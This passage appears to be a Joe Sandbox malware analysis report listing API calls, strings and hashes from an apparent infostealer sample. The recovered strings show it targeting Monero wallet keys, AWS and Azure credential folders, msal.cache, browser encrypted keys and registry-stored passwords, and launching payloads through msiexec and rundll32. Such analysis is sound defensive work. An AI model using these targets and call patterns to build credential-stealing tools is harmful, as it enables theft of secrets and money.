                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                  • String ID: "$"$------$------$------
                  • API String ID: 874700897-2180234286
                  • Opcode ID: 31c3ae68b24d921c47b83da49d5429cf02bd0845b4d39b7a79570cf42c8d8391
                  • Instruction ID: edcc1a405ecc2f019699c94bc08bce728ffb0e1212fdaebe23d2da183680db3e
                  • Opcode Fuzzy Hash: 31c3ae68b24d921c47b83da49d5429cf02bd0845b4d39b7a79570cf42c8d8391
                  • Instruction Fuzzy Hash: 6A122D71830118BBDB15EBA0DC96FEEB378BF14740F4042A9B10662492EF706A69CF65
                  APIs
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                    • Part of subcall function 002BA9B0: lstrlen.KERNEL32(?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002BA9C5
                    • Part of subcall function 002BA9B0: lstrcpy.KERNEL32(00000000), ref: 002BAA04
                    • Part of subcall function 002BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002BAA12
                    • Part of subcall function 002BA8A0: lstrcpy.KERNEL32(?,002C0E17), ref: 002BA905
                    • Part of subcall function 002B8B60: GetSystemTime.KERNEL32(002C0E1A,00D5EC80,002C05AE,?,?,002A13F9,?,0000001A,002C0E1A,00000000,?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002B8B86
                    • Part of subcall function 002BA920: lstrcpy.KERNEL32(00000000,?), ref: 002BA972
                    • Part of subcall function 002BA920: lstrcat.KERNEL32(00000000), ref: 002BA982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002ACF83
                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 002AD0C7
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002AD0CE
                  • lstrcat.KERNEL32(?,00000000), ref: 002AD208
                  • lstrcat.KERNEL32(?,002C1478), ref: 002AD217
                  • lstrcat.KERNEL32(?,00000000), ref: 002AD22A
                  • lstrcat.KERNEL32(?,002C147C), ref: 002AD239
                  • lstrcat.KERNEL32(?,00000000), ref: 002AD24C
                  • lstrcat.KERNEL32(?,002C1480), ref: 002AD25B
                  • lstrcat.KERNEL32(?,00000000), ref: 002AD26E
                  • lstrcat.KERNEL32(?,002C1484), ref: 002AD27D
                  • lstrcat.KERNEL32(?,00000000), ref: 002AD290
                  • lstrcat.KERNEL32(?,002C1488), ref: 002AD29F
                  • lstrcat.KERNEL32(?,00000000), ref: 002AD2B2
                  • lstrcat.KERNEL32(?,002C148C), ref: 002AD2C1
                  • lstrcat.KERNEL32(?,00000000), ref: 002AD2D4
                  • lstrcat.KERNEL32(?,002C1490), ref: 002AD2E3
                    • Part of subcall function 002BA820: lstrlen.KERNEL32(002A4F05,?,?,002A4F05,002C0DDE), ref: 002BA82B
                    • Part of subcall function 002BA820: lstrcpy.KERNEL32(002C0DDE,00000000), ref: 002BA885
                  • lstrlen.KERNEL32(?), ref: 002AD32A
                  • lstrlen.KERNEL32(?), ref: 002AD339
                    • Part of subcall function 002BAA70: StrCmpCA.SHLWAPI(00D58BC8,002AA7A7,?,002AA7A7,00D58BC8), ref: 002BAA8F
                  • DeleteFileA.KERNEL32(00000000), ref: 002AD3B4
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                  • String ID:
                  • API String ID: 1956182324-0
                  • Opcode ID: 0bc2dec8b9d0cee698211075305141ebf31b73a628eb3b2493c16f06f27a9800
                  • Instruction ID: 9b241be6c9af1bec408509a004631ddfa2cf32abb228c1430f1b3b5c79eb7dae
                  • Opcode Fuzzy Hash: 0bc2dec8b9d0cee698211075305141ebf31b73a628eb3b2493c16f06f27a9800
                  • Instruction Fuzzy Hash: 1FE10A71920108ABDB14FBA0DD96EEE7378BF14341F104168F147B6492DE35BA2ACF66
                  APIs
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                    • Part of subcall function 002BA920: lstrcpy.KERNEL32(00000000,?), ref: 002BA972
                    • Part of subcall function 002BA920: lstrcat.KERNEL32(00000000), ref: 002BA982
                    • Part of subcall function 002BA8A0: lstrcpy.KERNEL32(?,002C0E17), ref: 002BA905
                    • Part of subcall function 002BA9B0: lstrlen.KERNEL32(?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002BA9C5
                    • Part of subcall function 002BA9B0: lstrcpy.KERNEL32(00000000), ref: 002BAA04
                    • Part of subcall function 002BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002BAA12
                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00D5DA18,00000000,?,002C144C,00000000,?,?), ref: 002ACA6C
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 002ACA89
                  • GetFileSize.KERNEL32(00000000,00000000), ref: 002ACA95
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 002ACAA8
                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 002ACAD9
                  • StrStrA.SHLWAPI(?,00D5D8F8,002C0B52), ref: 002ACAF7
                  • StrStrA.SHLWAPI(00000000,00D5D970), ref: 002ACB1E
                  • StrStrA.SHLWAPI(?,00D5E228,00000000,?,002C1458,00000000,?,00000000,00000000,?,00D58AA8,00000000,?,002C1454,00000000,?), ref: 002ACCA2
                  • StrStrA.SHLWAPI(00000000,00D5E208), ref: 002ACCB9
                    • Part of subcall function 002AC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 002AC871
                    • Part of subcall function 002AC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 002AC87C
                  • StrStrA.SHLWAPI(?,00D5E208,00000000,?,002C145C,00000000,?,00000000,00D58C58), ref: 002ACD5A
                  • StrStrA.SHLWAPI(00000000,00D589F8), ref: 002ACD71
                    • Part of subcall function 002AC820: lstrcat.KERNEL32(?,002C0B46), ref: 002AC943
                    • Part of subcall function 002AC820: lstrcat.KERNEL32(?,002C0B47), ref: 002AC957
                    • Part of subcall function 002AC820: lstrcat.KERNEL32(?,002C0B4E), ref: 002AC978
                  • lstrlen.KERNEL32(00000000), ref: 002ACE44
                  • CloseHandle.KERNEL32(00000000), ref: 002ACE9C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                  • String ID:
                  • API String ID: 3744635739-3916222277
                  • Opcode ID: 8d24e367c49f9f2907d7a480be1d008c2d12f0faf8da461eb0a283c80a5914f0
                  • Instruction ID: 0029d088b6df5196965e019feac4a9882a389b269d0ebe7789b62027bd5ad0ef
                  • Opcode Fuzzy Hash: 8d24e367c49f9f2907d7a480be1d008c2d12f0faf8da461eb0a283c80a5914f0
                  • Instruction Fuzzy Hash: 36E11C71920108BBDB14EBA0DC96FEEB778AF14340F504169F10667592EF307A6ACF66
                  APIs
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                  • RegOpenKeyExA.ADVAPI32(00000000,00D5BFD0,00000000,00020019,00000000,002C05B6), ref: 002B83A4
                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 002B8426
                  • wsprintfA.USER32 ref: 002B8459
                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 002B847B
                  • RegCloseKey.ADVAPI32(00000000), ref: 002B848C
                  • RegCloseKey.ADVAPI32(00000000), ref: 002B8499
                    • Part of subcall function 002BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002BA7E6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                  • String ID: - $%s\%s$?
                  • API String ID: 3246050789-3278919252
                  • Opcode ID: 1af87fbe51c5be360882de7dc302398b864dbb3809660691f93a832856901413
                  • Instruction ID: b4c98ceb001d2ceb1e375c3b3851041733ae4b311274056d5fd320287dfd3d85
                  • Opcode Fuzzy Hash: 1af87fbe51c5be360882de7dc302398b864dbb3809660691f93a832856901413
                  • Instruction Fuzzy Hash: A7810C71920118ABDB24DF54CC95FEAB7BCBF08740F0082D9E10AA6141DF716B95CFA5
                  APIs
                    • Part of subcall function 002B8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 002B8E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 002B4DB0
                  • lstrcat.KERNEL32(?,\.azure\), ref: 002B4DCD
                    • Part of subcall function 002B4910: wsprintfA.USER32 ref: 002B492C
                    • Part of subcall function 002B4910: FindFirstFileA.KERNEL32(?,?), ref: 002B4943
                  • lstrcat.KERNEL32(?,00000000), ref: 002B4E3C
                  • lstrcat.KERNEL32(?,\.aws\), ref: 002B4E59
                    • Part of subcall function 002B4910: StrCmpCA.SHLWAPI(?,002C0FDC), ref: 002B4971
                    • Part of subcall function 002B4910: StrCmpCA.SHLWAPI(?,002C0FE0), ref: 002B4987
                    • Part of subcall function 002B4910: FindNextFileA.KERNEL32(000000FF,?), ref: 002B4B7D
                    • Part of subcall function 002B4910: FindClose.KERNEL32(000000FF), ref: 002B4B92
                  • lstrcat.KERNEL32(?,00000000), ref: 002B4EC8
                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 002B4EE5
                    • Part of subcall function 002B4910: wsprintfA.USER32 ref: 002B49B0
                    • Part of subcall function 002B4910: StrCmpCA.SHLWAPI(?,002C08D2), ref: 002B49C5
                    • Part of subcall function 002B4910: wsprintfA.USER32 ref: 002B49E2
                    • Part of subcall function 002B4910: PathMatchSpecA.SHLWAPI(?,?), ref: 002B4A1E
                    • Part of subcall function 002B4910: lstrcat.KERNEL32(?,00D5FC40), ref: 002B4A4A
                    • Part of subcall function 002B4910: lstrcat.KERNEL32(?,002C0FF8), ref: 002B4A5C
                    • Part of subcall function 002B4910: lstrcat.KERNEL32(?,?), ref: 002B4A70
                    • Part of subcall function 002B4910: lstrcat.KERNEL32(?,002C0FFC), ref: 002B4A82
                    • Part of subcall function 002B4910: lstrcat.KERNEL32(?,?), ref: 002B4A96
                    • Part of subcall function 002B4910: CopyFileA.KERNEL32(?,?,00000001), ref: 002B4AAC
                    • Part of subcall function 002B4910: DeleteFileA.KERNEL32(?), ref: 002B4B31
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                  • API String ID: 949356159-974132213
                  • Opcode ID: 4ca3e30ecb73cd85bec9f60efc7bd5f1c013bd2e82a5f07a111b1198379574d9
                  • Instruction ID: c789eba0535670d56ee1f2927d518435524ade3fd3282183df82aebd54eb9be5
                  • Opcode Fuzzy Hash: 4ca3e30ecb73cd85bec9f60efc7bd5f1c013bd2e82a5f07a111b1198379574d9
                  • Instruction Fuzzy Hash: F241A87A96020867DB10F770DC87FED3338AB25740F4049987689A60C2EEB457F98F92
                  APIs
                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 002B906C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateGlobalStream
                  • String ID: image/jpeg
                  • API String ID: 2244384528-3785015651
                  • Opcode ID: b26f575baf9edda7667d3e7f421dc1904a7f97e3655c79c9a8a2b7c4485b0560
                  • Instruction ID: 73cf10d6d2b0587d78a72a1172e5369feba7965f151f6d85c2a2d99c327f9a1d
                  • Opcode Fuzzy Hash: b26f575baf9edda7667d3e7f421dc1904a7f97e3655c79c9a8a2b7c4485b0560
                  • Instruction Fuzzy Hash: AD71FC75D20208ABDB04EFE4DC89FEEB7B8BF48300F108518F615AB291DB74A955CB65
                  APIs
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                  • ShellExecuteEx.SHELL32(0000003C), ref: 002B31C5
                  • ShellExecuteEx.SHELL32(0000003C), ref: 002B335D
                  • ShellExecuteEx.SHELL32(0000003C), ref: 002B34EA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExecuteShell$lstrcpy
                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                  • API String ID: 2507796910-3625054190
                  • Opcode ID: 39c3d69e6621f341d20eb543ab631873b8cedde2b95f4971f7b9f1c7a8e1af53
                  • Instruction ID: 882473f7265e187971e5d7e6310308e84426d6c9687983a7fcbf2b635a829e92
                  • Opcode Fuzzy Hash: 39c3d69e6621f341d20eb543ab631873b8cedde2b95f4971f7b9f1c7a8e1af53
                  • Instruction Fuzzy Hash: 6A120071820108AADB15FBA0DC92FEEB778AF14340F504169F50776591EF742B6ACFA2
                  APIs
                    • Part of subcall function 002BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002BA7E6
                    • Part of subcall function 002A6280: InternetOpenA.WININET(002C0DFE,00000001,00000000,00000000,00000000), ref: 002A62E1
                    • Part of subcall function 002A6280: StrCmpCA.SHLWAPI(?,00D5FCE0), ref: 002A6303
                    • Part of subcall function 002A6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 002A6335
                    • Part of subcall function 002A6280: HttpOpenRequestA.WININET(00000000,GET,?,00D5F350,00000000,00000000,00400100,00000000), ref: 002A6385
                    • Part of subcall function 002A6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 002A63BF
                    • Part of subcall function 002A6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002A63D1
                    • Part of subcall function 002BA8A0: lstrcpy.KERNEL32(?,002C0E17), ref: 002BA905
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 002B5318
                  • lstrlen.KERNEL32(00000000), ref: 002B532F
                    • Part of subcall function 002B8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 002B8E52
                  • StrStrA.SHLWAPI(00000000,00000000), ref: 002B5364
                  • lstrlen.KERNEL32(00000000), ref: 002B5383
                  • lstrlen.KERNEL32(00000000), ref: 002B53AE
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                  • API String ID: 3240024479-1526165396
                  • Opcode ID: 128db4327a59db3fec7414a03502c7339efce210bf997158677be01b2f191e90
                  • Instruction ID: 66c44d132886e48342454296a4c4ed5fa12d6023822e8eb67efd1fd9669d1583
                  • Opcode Fuzzy Hash: 128db4327a59db3fec7414a03502c7339efce210bf997158677be01b2f191e90
                  • Instruction Fuzzy Hash: 1051DE30930148ABCB24FF60C9A7BED7779AF11381F504128F8066A592DF746B65DF62
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpylstrlen
                  • String ID:
                  • API String ID: 2001356338-0
                  • Opcode ID: 5774b47af7225189db541ef5d6dcdef433d2de08f0146332d280027ecc4eaf24
                  • Instruction ID: 6cdd77b96d3073bba47eef06887571f86854d9735b2ee3e653ab8ddc8e2fd9d7
                  • Opcode Fuzzy Hash: 5774b47af7225189db541ef5d6dcdef433d2de08f0146332d280027ecc4eaf24
                  • Instruction Fuzzy Hash: 7AC193B5D10209ABCB14EF60DCD9FEA7378BB54344F004598E50A67242DB70AEA5CF91
                  APIs
                    • Part of subcall function 002B8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 002B8E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 002B42EC
                  • lstrcat.KERNEL32(?,00D5F1D0), ref: 002B430B
                  • lstrcat.KERNEL32(?,?), ref: 002B431F
                  • lstrcat.KERNEL32(?,00D5D9E8), ref: 002B4333
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                    • Part of subcall function 002B8D90: GetFileAttributesA.KERNEL32(00000000,?,002A1B54,?,?,002C564C,?,?,002C0E1F), ref: 002B8D9F
                    • Part of subcall function 002A9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 002A9D39
                    • Part of subcall function 002A99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002A99EC
                    • Part of subcall function 002A99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 002A9A11
                    • Part of subcall function 002A99C0: LocalAlloc.KERNEL32(00000040,?), ref: 002A9A31
                    • Part of subcall function 002A99C0: ReadFile.KERNEL32(000000FF,?,00000000,002A148F,00000000), ref: 002A9A5A
                    • Part of subcall function 002A99C0: LocalFree.KERNEL32(002A148F), ref: 002A9A90
                    • Part of subcall function 002A99C0: CloseHandle.KERNEL32(000000FF), ref: 002A9A9A
                    • Part of subcall function 002B93C0: GlobalAlloc.KERNEL32(00000000,002B43DD,002B43DD), ref: 002B93D3
                  • StrStrA.SHLWAPI(?,00D5F128), ref: 002B43F3
                  • GlobalFree.KERNEL32(?), ref: 002B4512
                    • Part of subcall function 002A9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N*,00000000,00000000), ref: 002A9AEF
                    • Part of subcall function 002A9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,002A4EEE,00000000,?), ref: 002A9B01
                    • Part of subcall function 002A9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N*,00000000,00000000), ref: 002A9B2A
                    • Part of subcall function 002A9AC0: LocalFree.KERNEL32(?,?,?,?,002A4EEE,00000000,?), ref: 002A9B3F
                  • lstrcat.KERNEL32(?,00000000), ref: 002B44A3
                  • StrCmpCA.SHLWAPI(?,002C08D1), ref: 002B44C0
                  • lstrcat.KERNEL32(00000000,00000000), ref: 002B44D2
                  • lstrcat.KERNEL32(00000000,?), ref: 002B44E5
                  • lstrcat.KERNEL32(00000000,002C0FB8), ref: 002B44F4
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                  • String ID:
                  • API String ID: 3541710228-0
                  • Opcode ID: ccb24424cd5150e7bb3b30ef334473f40d09689734c9d793e27602ab2616973a
                  • Instruction ID: 1a0e42e3d8929e7f81138931081cc2501acb200674b33539d2184862cb8ac54c
                  • Opcode Fuzzy Hash: ccb24424cd5150e7bb3b30ef334473f40d09689734c9d793e27602ab2616973a
                  • Instruction Fuzzy Hash: 917113B6910208ABDB14FBA0DC85FEE7779BB48340F044598F60996182EE74EB65CF91
                  APIs
                    • Part of subcall function 002A12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 002A12B4
                    • Part of subcall function 002A12A0: RtlAllocateHeap.NTDLL(00000000), ref: 002A12BB
                    • Part of subcall function 002A12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 002A12D7
                    • Part of subcall function 002A12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 002A12F5
                    • Part of subcall function 002A12A0: RegCloseKey.ADVAPI32(?), ref: 002A12FF
                  • lstrcat.KERNEL32(?,00000000), ref: 002A134F
                  • lstrlen.KERNEL32(?), ref: 002A135C
                  • lstrcat.KERNEL32(?,.keys), ref: 002A1377
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                    • Part of subcall function 002BA9B0: lstrlen.KERNEL32(?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002BA9C5
                    • Part of subcall function 002BA9B0: lstrcpy.KERNEL32(00000000), ref: 002BAA04
                    • Part of subcall function 002BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002BAA12
                    • Part of subcall function 002BA8A0: lstrcpy.KERNEL32(?,002C0E17), ref: 002BA905
                    • Part of subcall function 002B8B60: GetSystemTime.KERNEL32(002C0E1A,00D5EC80,002C05AE,?,?,002A13F9,?,0000001A,002C0E1A,00000000,?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002B8B86
                    • Part of subcall function 002BA920: lstrcpy.KERNEL32(00000000,?), ref: 002BA972
                    • Part of subcall function 002BA920: lstrcat.KERNEL32(00000000), ref: 002BA982
                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 002A1465
                    • Part of subcall function 002BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002BA7E6
                    • Part of subcall function 002A99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002A99EC
                    • Part of subcall function 002A99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 002A9A11
                    • Part of subcall function 002A99C0: LocalAlloc.KERNEL32(00000040,?), ref: 002A9A31
                    • Part of subcall function 002A99C0: ReadFile.KERNEL32(000000FF,?,00000000,002A148F,00000000), ref: 002A9A5A
                    • Part of subcall function 002A99C0: LocalFree.KERNEL32(002A148F), ref: 002A9A90
                    • Part of subcall function 002A99C0: CloseHandle.KERNEL32(000000FF), ref: 002A9A9A
                  • DeleteFileA.KERNEL32(00000000), ref: 002A14EF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                  • API String ID: 3478931302-218353709
                  • Opcode ID: cb3e5076135cb0a77d13df02cff487672ecc0cee33c9d7e87cfa92775b656115
                  • Instruction ID: 22568df214ddb032738722c98537d39066cdd76760c5536924409ded2d303cb5
                  • Opcode Fuzzy Hash: cb3e5076135cb0a77d13df02cff487672ecc0cee33c9d7e87cfa92775b656115
                  • Instruction Fuzzy Hash: 005158B1D6011967CB15FB60DC92FED737CAF54340F4041E8B60A66092EE306BA9CFA6
                  APIs
                    • Part of subcall function 002A72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 002A733A
                    • Part of subcall function 002A72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 002A73B1
                    • Part of subcall function 002A72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 002A740D
                    • Part of subcall function 002A72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 002A7452
                    • Part of subcall function 002A72D0: HeapFree.KERNEL32(00000000), ref: 002A7459
                  • lstrcat.KERNEL32(00000000,002C17FC), ref: 002A7606
                  • lstrcat.KERNEL32(00000000,00000000), ref: 002A7648
                  • lstrcat.KERNEL32(00000000, : ), ref: 002A765A
                  • lstrcat.KERNEL32(00000000,00000000), ref: 002A768F
                  • lstrcat.KERNEL32(00000000,002C1804), ref: 002A76A0
                  • lstrcat.KERNEL32(00000000,00000000), ref: 002A76D3
                  • lstrcat.KERNEL32(00000000,002C1808), ref: 002A76ED
                  • task.LIBCPMTD ref: 002A76FB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
